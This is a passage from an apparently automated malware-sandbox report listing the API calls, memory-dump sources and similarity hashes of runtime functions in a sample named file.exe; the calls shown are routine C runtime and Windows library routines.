                                                                        • Opcode Fuzzy Hash: ee4201043f7e33e92d798f264ab67d0b0c4382dac7319eae871dba05561988c3
                                                                        • Instruction Fuzzy Hash: E821C27AA08216BF97109F668C8098BB7ECFF4137C7424614F96DD6A60E730EC0187B0
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,6CD985C4,00000000,?,00000001,00000000,?,6CD9863B,00000001,FlsFree,6CDA1D3C,FlsFree,00000000), ref: 6CD98593
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: api-ms-
                                                                        • API String ID: 3664257935-2084034818
                                                                        • Opcode ID: a8ecd39ccd36b0d0f3146cdc87eb5915bd6216397016160d3bedfe5793e218b2
                                                                        • Instruction ID: 269d508d0df9be37d3b75a82f4df0fbe68cffaf60c0f75504e13dccee3c6e301
                                                                        • Opcode Fuzzy Hash: a8ecd39ccd36b0d0f3146cdc87eb5915bd6216397016160d3bedfe5793e218b2
                                                                        • Instruction Fuzzy Hash: EC11063AF45221EBEF524BA9DC40B4D73B8AF02BA8F190212FA14F7694D730ED0486D5
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CD98B6C,?,?,6CD98B34,?,00000001,?), ref: 6CD98BCF
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CD98BE2
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,6CD98B6C,?,?,6CD98B34,?,00000001,?), ref: 6CD98C05
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: fd879563deba46bf6602d00e0e1a309511317395e422da52e1cb30a27db7f260
                                                                        • Instruction ID: 2d17a0dd472a38a14de08821c6290b51202470ca2d3eb13db3e245d6e9d83fe3
                                                                        • Opcode Fuzzy Hash: fd879563deba46bf6602d00e0e1a309511317395e422da52e1cb30a27db7f260
                                                                        • Instruction Fuzzy Hash: 70F01C39A02159FBEF02AB91DD19B9E7FBDEB01799F104061E501A2560CB34CE05EB94
                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 6CD9D25B
                                                                        • __alloca_probe_16.LIBCMT ref: 6CD9D321
                                                                        • __freea.LIBCMT ref: 6CD9D38D
                                                                          • Part of subcall function 6CD9C38C: HeapAlloc.KERNEL32(00000000,6CD9C0C3,6CD9C0C3,?,6CD9ADC3,00000220,?,6CD9C0C3,?,?,?,?,6CD9E1E1,00000001,?,?), ref: 6CD9C3BE
                                                                        • __freea.LIBCMT ref: 6CD9D396
                                                                        • __freea.LIBCMT ref: 6CD9D3B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 1096550386-0
                                                                        • Opcode ID: 7dfcb07a0e430fe86c312669d596fd2188037bbbb8c06a158b19bf74e1141f77
                                                                        • Instruction ID: 191d9c0e68f6c8a3641ec0c7969741fb8a7cbb9f5194e1c63a3d64640fb810a5
                                                                        • Opcode Fuzzy Hash: 7dfcb07a0e430fe86c312669d596fd2188037bbbb8c06a158b19bf74e1141f77
                                                                        • Instruction Fuzzy Hash: 9451C57A601216FFEB118FA4CC40EAF37A9EF85759F210129FD14A7A60E734DC4187A1
                                                                        APIs
                                                                        • _free.LIBCMT ref: 6CD9E73D
                                                                          • Part of subcall function 6CD9A013: HeapFree.KERNEL32(00000000,00000000,?,6CD9924C), ref: 6CD9A029
                                                                          • Part of subcall function 6CD9A013: GetLastError.KERNEL32(?,?,6CD9924C), ref: 6CD9A03B
                                                                        • _free.LIBCMT ref: 6CD9E74F
                                                                        • _free.LIBCMT ref: 6CD9E761
                                                                        • _free.LIBCMT ref: 6CD9E773
                                                                        • _free.LIBCMT ref: 6CD9E785
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 790578a4b36f69f7ad3ac1a487b0fd4e990a35cf2a6e921d548fd88b8a2a7bb7
                                                                        • Instruction ID: 7b95ee61527751c4bb260692bad9acbc161241ae728d262908b41052278573d9
                                                                        • Opcode Fuzzy Hash: 790578a4b36f69f7ad3ac1a487b0fd4e990a35cf2a6e921d548fd88b8a2a7bb7
                                                                        • Instruction Fuzzy Hash: 40F03C3AA01204D7CB60EB68F5C4D9673EDBB046287610805E13CD7E24CB30F98046E2
                                                                        APIs
                                                                          • Part of subcall function 6CD9A739: _free.LIBCMT ref: 6CD9A747
                                                                          • Part of subcall function 6CD9B30D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CD9D383,?,00000000,00000000), ref: 6CD9B3B9
                                                                        • GetLastError.KERNEL32 ref: 6CD9A17F
                                                                        • __dosmaperr.LIBCMT ref: 6CD9A186
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CD9A1C5
                                                                        • __dosmaperr.LIBCMT ref: 6CD9A1CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                        • String ID:
                                                                        • API String ID: 167067550-0
                                                                        • Opcode ID: 08d6756f9150a02b41ec4cba7fbb6b7fa5c1c62e821c5f5cc19586cefa33ea56
                                                                        • Instruction ID: 1e5332900111ff18a7a4c7f338ea17d52a07804c8d75adb84f9ae88621685acc
                                                                        • Opcode Fuzzy Hash: 08d6756f9150a02b41ec4cba7fbb6b7fa5c1c62e821c5f5cc19586cefa33ea56
                                                                        • Instruction Fuzzy Hash: 5521D67AA08205AF9B109F66CC90D5BB7BCEF013687148216F95DE7A60D730EC0087B0
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,?,6CD9DD27,?,00000001,6CD9C134,?,6CD9E1E1,00000001,?,?,?,6CD9C0C3,?,00000000), ref: 6CD99A1C
                                                                        • _free.LIBCMT ref: 6CD99A79
                                                                        • _free.LIBCMT ref: 6CD99AAF
                                                                        • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CD9E1E1,00000001,?,?,?,6CD9C0C3,?,00000000,00000000,6CDA6360,0000002C,6CD9C134), ref: 6CD99ABA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        • Opcode ID: 3c239e2d73028531be3e5e937befa0878c9c8e92364a696350ce10c47ea727b0
                                                                        • Instruction ID: f550e0fbda52436907377aff75c913af2dd87d854954756654e964631047a8de
                                                                        • Opcode Fuzzy Hash: 3c239e2d73028531be3e5e937befa0878c9c8e92364a696350ce10c47ea727b0
                                                                        • Instruction Fuzzy Hash: 7411943E344211AEAB5177B59CC099A6769E7C266DB260624F23CC3AF0EE2188084121
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00000001,6CD99FA8,6CD9A039,?,?,6CD9924C), ref: 6CD99B73
                                                                        • _free.LIBCMT ref: 6CD99BD0
                                                                        • _free.LIBCMT ref: 6CD99C06
                                                                        • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CD99FA8,6CD9A039,?,?,6CD9924C), ref: 6CD99C11
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        • Opcode ID: da1bf44b3b22ef97c97692028feab5abf8e6b8410313727ed964de8699753df8
                                                                        • Instruction ID: 3f3964253d30afeab8bd4b4f083bfe870ec9f00cccd75f7abf3f4ad2266d0a6b
                                                                        • Opcode Fuzzy Hash: da1bf44b3b22ef97c97692028feab5abf8e6b8410313727ed964de8699753df8
                                                                        • Instruction Fuzzy Hash: 5811863A354710AEEB5117799CC4EAB266DA7C367DB270724F63CD3AF0DF2588085121
                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CD9E9D0,?,00000001,?,00000001,?,6CD9DCB6,?,?,00000001), ref: 6CD9EF8D
                                                                        • GetLastError.KERNEL32(?,6CD9E9D0,?,00000001,?,00000001,?,6CD9DCB6,?,?,00000001,?,00000001,?,6CD9E202,6CD9C0C3), ref: 6CD9EF99
                                                                          • Part of subcall function 6CD9EF5F: CloseHandle.KERNEL32(FFFFFFFE,6CD9EFA9,?,6CD9E9D0,?,00000001,?,00000001,?,6CD9DCB6,?,?,00000001,?,00000001), ref: 6CD9EF6F
                                                                        • ___initconout.LIBCMT ref: 6CD9EFA9
                                                                          • Part of subcall function 6CD9EF21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CD9EF50,6CD9E9BD,00000001,?,6CD9DCB6,?,?,00000001,?), ref: 6CD9EF34
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CD9E9D0,?,00000001,?,00000001,?,6CD9DCB6,?,?,00000001,?), ref: 6CD9EFBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: a487e6ca1ca829f1ab754d3b5a5b970a6588050ea29c4861d32d7aa210ea6650
                                                                        • Instruction ID: 7482b37a63c375cb799cc6e0bef5c23fd7d09cc8d82874136a5ce8e39483fd0d
                                                                        • Opcode Fuzzy Hash: a487e6ca1ca829f1ab754d3b5a5b970a6588050ea29c4861d32d7aa210ea6650
                                                                        • Instruction Fuzzy Hash: A7F0F83A204555BBDF222FD2EC049C93FBAFB096A5B054011FB2995620C7329820ABD4
                                                                        APIs
                                                                        • _free.LIBCMT ref: 6CD9934D
                                                                          • Part of subcall function 6CD9A013: HeapFree.KERNEL32(00000000,00000000,?,6CD9924C), ref: 6CD9A029
                                                                          • Part of subcall function 6CD9A013: GetLastError.KERNEL32(?,?,6CD9924C), ref: 6CD9A03B
                                                                        • _free.LIBCMT ref: 6CD99360
                                                                        • _free.LIBCMT ref: 6CD99371
                                                                        • _free.LIBCMT ref: 6CD99382
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: cc0b15710d30c0030a7a04b596f657346f59c52b13f5f746ffa71f0a2600dc9f
                                                                        • Instruction ID: 95934dd2a4c681c9a032cb1693034636ac15901bbe7d9deab3c38f2b7b9460b5
                                                                        • Opcode Fuzzy Hash: cc0b15710d30c0030a7a04b596f657346f59c52b13f5f746ffa71f0a2600dc9f
                                                                        • Instruction Fuzzy Hash: 9AE04F7BA001609AEF615F51F6105D57B39B70AA047028006F6384336AC7714252AF92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user\Desktop\file.exe
                                                                        • API String ID: 0-1957095476
                                                                        • Opcode ID: 27eed555264507c6a55140757d2f8ee7a69ed5a5e441e8c10c4475b4ffe35056
                                                                        • Instruction ID: 5b729e3fe7817a55f0e16f05d00d255b16dee532784c83906f00c09cd4199b37
                                                                        • Opcode Fuzzy Hash: 27eed555264507c6a55140757d2f8ee7a69ed5a5e441e8c10c4475b4ffe35056
                                                                        • Instruction Fuzzy Hash: 2241B1B5E05214AFDB118B99DC80AEEBBF8EB96B04F100057E414D7770D7718A45CB60